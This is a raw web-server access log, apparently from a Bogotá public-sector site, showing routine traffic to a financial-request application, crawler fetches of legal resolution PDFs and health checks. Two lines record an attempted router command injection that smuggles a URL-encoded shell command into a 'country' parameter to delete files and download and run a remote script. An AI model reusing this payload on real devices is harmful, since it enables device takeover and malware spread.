186.80.52.0 - - [14/Jan/2024:00:29:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 43861
186.80.52.0 - - [14/Jan/2024:00:29:23 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:29:23 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:29:23 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.80.52.0 - - [14/Jan/2024:00:29:23 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:29:23 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:29:23 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:29:23 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:29:23 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:29:23 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:29:23 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 37233
186.80.52.0 - - [14/Jan/2024:00:29:26 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:29:26 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12811
186.80.52.0 - - [14/Jan/2024:00:29:28 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 156037
186.80.52.0 - - [14/Jan/2024:00:29:29 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:29:29 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:29:29 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:29:29 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:29:29 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:29:29 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:29:29 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
216.244.66.195 - - [14/Jan/2024:00:29:32 -0500] "GET /BLA/resoluciones/AUTOS%202022/0234.pdf HTTP/1.1" 200 414381
201.245.192.253 - - [14/Jan/2024:00:29:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39291
201.245.192.253 - - [14/Jan/2024:00:29:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:00:29:44 -0500] "GET /BLA/resoluciones/AUTOS%202022/0350.pdf HTTP/1.1" 200 372779
216.244.66.195 - - [14/Jan/2024:00:29:55 -0500] "GET /BLA/resoluciones/AUTOS%202022/0384.pdf HTTP/1.1" 200 445731
66.249.75.129 - - [14/Jan/2024:00:30:00 -0500] "GET /portaldeninos/wp-content/uploads/2021/11/flores-humedales-bogota-18-mayo-1024x768.jpg HTTP/1.1" 200 82153
216.244.66.195 - - [14/Jan/2024:00:30:04 -0500] "GET /BLA/resoluciones/AUTOS%202022/0540.pdf HTTP/1.1" 200 375332
186.80.52.0 - - [14/Jan/2024:00:30:06 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 84195
216.244.66.195 - - [14/Jan/2024:00:30:13 -0500] "GET /BLA/resoluciones/AUTOS%202022/0986.pdf HTTP/1.1" 200 422629
216.244.66.195 - - [14/Jan/2024:00:30:21 -0500] "GET /BLA/resoluciones/AUTOS%202022/1034.pdf HTTP/1.1" 200 359305
201.245.192.253 - - [14/Jan/2024:00:30:22 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:00:30:28 -0500] "GET /BLA/resoluciones/AUTOS%202022/1829.pdf HTTP/1.1" 200 448938
201.245.192.253 - - [14/Jan/2024:00:30:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39439
216.244.66.195 - - [14/Jan/2024:00:30:33 -0500] "GET /BLA/resoluciones/AUTOS%202022/2052.pdf HTTP/1.1" 200 375166
216.244.66.195 - - [14/Jan/2024:00:30:39 -0500] "GET /BLA/resoluciones/AUTOS%202022/3579.pdf HTTP/1.1" 200 1182489
216.245.221.92 - - [14/Jan/2024:00:30:50 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [14/Jan/2024:00:31:18 -0500] "GET /BLA/resoluciones/AUTOS%202022/3591.pdf HTTP/1.1" 200 507466
201.245.192.253 - - [14/Jan/2024:00:31:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:00:31:49 -0500] "GET /BLA/resoluciones/AUTOS%202022/3705.pdf HTTP/1.1" 200 1462460
201.245.192.253 - - [14/Jan/2024:00:32:22 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:00:32:23 -0500] "GET /BLA/resoluciones/AUTOS%202022/3803.pdf HTTP/1.1" 200 883886
172.22.2.4 - - [14/Jan/2024:00:30:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [14/Jan/2024:00:32:53 -0500] "GET /BLA/resoluciones/AUTOS%202022/4917.pdf HTTP/1.1" 200 497973
172.22.2.4 - - [14/Jan/2024:00:31:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58666
201.245.192.253 - - [14/Jan/2024:00:33:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
157.55.39.202 - - [14/Jan/2024:00:34:14 -0500] "GET /BLA/resoluciones/AUTOS%202020/4187.pdf HTTP/1.1" 200 333978
201.245.192.253 - - [14/Jan/2024:00:34:22 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
18.227.52.67 - - [14/Jan/2024:00:34:38 -0500] "GET /ai.txt?t=1705194271.023065 HTTP/1.1" 404 1035
18.227.52.67 - - [14/Jan/2024:00:34:38 -0500] "GET /.well-known/ai.txt?t=1705194271.023065 HTTP/1.1" 404 1035
201.245.192.253 - - [14/Jan/2024:00:34:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38672
201.245.192.253 - - [14/Jan/2024:00:34:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39291
201.245.192.253 - - [14/Jan/2024:00:35:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39439
173.252.127.5 - - [14/Jan/2024:00:35:29 -0500] "GET /inicia-el-2024-conociendo-la-biodiversidad-de-bogoti.html HTTP/1.1" 200 894
201.245.192.253 - - [14/Jan/2024:00:35:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [14/Jan/2024:00:35:50 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Jan/2024:00:36:22 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.13 - - [14/Jan/2024:00:37:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3487.pdf HTTP/1.1" 200 682153
201.245.192.253 - - [14/Jan/2024:00:37:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [14/Jan/2024:00:38:22 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [14/Jan/2024:00:36:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Jan/2024:00:38:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38672
172.22.2.4 - - [14/Jan/2024:00:37:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58666
201.245.192.253 - - [14/Jan/2024:00:39:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39291
201.245.192.253 - - [14/Jan/2024:00:39:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [14/Jan/2024:00:40:22 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [14/Jan/2024:00:40:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39439
216.245.221.92 - - [14/Jan/2024:00:40:50 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.166 - - [14/Jan/2024:00:41:07 -0500] "GET /bla/resoluciones/RESOLUCIONES%202021/1603.pdf HTTP/1.1" 200 457417
201.245.192.253 - - [14/Jan/2024:00:41:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [14/Jan/2024:00:42:22 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.13 - - [14/Jan/2024:00:43:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/3471.pdf HTTP/1.1" 200 535192
201.245.192.253 - - [14/Jan/2024:00:43:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [14/Jan/2024:00:42:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Jan/2024:00:44:22 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [14/Jan/2024:00:43:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60529
185.224.128.191 - - [14/Jan/2024:00:45:16 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20rm%20-rf%20%2A%3B%20wget%20http%3A%2F%2F104.168.5.4%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B.%2Ftenda.sh) HTTP/1.1" 404 1018
185.224.128.191 - - [14/Jan/2024:00:45:16 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20rm%20-rf%20%2A%3B%20wget%20http%3A%2F%2F104.168.5.4%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B.%2Ftenda.sh) HTTP/1.1" 404 1018
201.245.192.253 - - [14/Jan/2024:00:45:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39439
201.245.192.253 - - [14/Jan/2024:00:45:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [14/Jan/2024:00:45:50 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Jan/2024:00:46:22 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:00:47:29 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [14/Jan/2024:00:47:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
186.80.52.0 - - [14/Jan/2024:00:47:40 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 34885
186.80.52.0 - - [14/Jan/2024:00:47:45 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:47:45 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:47:45 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:47:45 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:47:45 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:47:45 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.80.52.0 - - [14/Jan/2024:00:47:45 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:47:45 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:47:45 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 28231
186.80.52.0 - - [14/Jan/2024:00:47:46 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 28231
186.80.52.0 - - [14/Jan/2024:00:47:46 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 28231
186.80.52.0 - - [14/Jan/2024:00:47:47 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1376
186.80.52.0 - - [14/Jan/2024:00:47:47 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1380
186.80.52.0 - - [14/Jan/2024:00:47:48 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1384
186.80.52.0 - - [14/Jan/2024:00:47:48 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1380
186.80.52.0 - - [14/Jan/2024:00:47:50 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 32413
186.80.52.0 - - [14/Jan/2024:00:47:52 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 26646
186.80.52.0 - - [14/Jan/2024:00:48:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 60236
186.80.52.0 - - [14/Jan/2024:00:48:04 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:48:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:48:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:48:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:48:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:48:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:48:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:48:06 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/crearModificarSolicitudProceso.xhtml HTTP/1.1" 200 51773
186.80.52.0 - - [14/Jan/2024:00:48:09 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/crearModificarSolicitudProceso.xhtml HTTP/1.1" 200 25134
186.80.52.0 - - [14/Jan/2024:00:48:14 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/crearModificarSolicitudProceso.xhtml HTTP/1.1" 200 6295
186.80.52.0 - - [14/Jan/2024:00:48:18 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/crearModificarSolicitudProceso.xhtml HTTP/1.1" 200 9540
201.245.192.253 - - [14/Jan/2024:00:48:22 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
186.80.52.0 - - [14/Jan/2024:00:48:23 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/crearModificarSolicitudProceso.xhtml HTTP/1.1" 200 7338
186.80.52.0 - - [14/Jan/2024:00:48:48 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/crearModificarSolicitudProceso.xhtml HTTP/1.1" 200 24576
186.80.52.0 - - [14/Jan/2024:00:48:48 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:48:48 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:48:48 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:48:48 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:48:48 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:48:48 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:48:48 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:48:51 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProyectoActividad/asociarProyectoSolicitud.xhtml HTTP/1.1" 200 6705
186.80.52.0 - - [14/Jan/2024:00:48:52 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProyectoActividad/asociarProyectoSolicitud.xhtml HTTP/1.1" 200 1696
186.80.52.0 - - [14/Jan/2024:00:48:53 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProyectoActividad/asociarProyectoSolicitud.xhtml HTTP/1.1" 200 54731
186.80.52.0 - - [14/Jan/2024:00:48:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:48:53 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:48:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:48:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:48:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:48:54 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:48:54 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:49:03 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:49:04 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProyectoActividad/asociarActividadSolicitud.xhtml HTTP/1.1" 200 19998
186.80.52.0 - - [14/Jan/2024:00:49:04 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:49:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:49:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:49:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:49:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:49:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:49:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.54.178 - - [14/Jan/2024:00:49:06 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
47.128.54.178 - - [14/Jan/2024:00:49:06 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
186.80.52.0 - - [14/Jan/2024:00:49:19 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProyectoActividad/asociarFuentesSolicitud.xhtml HTTP/1.1" 200 83518
186.80.52.0 - - [14/Jan/2024:00:49:19 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:49:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:49:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:49:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:49:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:49:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:49:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.54.178 - - [14/Jan/2024:00:49:04 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202009%2F&order=asc&sort=size HTTP/1.1" 200 307147
201.245.192.253 - - [14/Jan/2024:00:49:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
186.80.52.0 - - [14/Jan/2024:00:49:44 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/crearModificarSolicitudProceso.xhtml HTTP/1.1" 200 45529
186.80.52.0 - - [14/Jan/2024:00:49:55 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:49:55 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:49:55 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:49:56 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:49:56 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:49:56 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:49:56 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
172.22.2.4 - - [14/Jan/2024:00:48:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.80.52.0 - - [14/Jan/2024:00:50:04 -0500] "POST /sipse/faces/presentacion/financiero/solicitudBienServicio/asociarBienServicioSolicitud.xhtml HTTP/1.1" 200 2724
186.80.52.0 - - [14/Jan/2024:00:50:14 -0500] "POST /sipse/faces/presentacion/financiero/solicitudBienServicio/asociarBienServicioSolicitud.xhtml HTTP/1.1" 200 79279
186.80.52.0 - - [14/Jan/2024:00:50:14 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:50:14 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
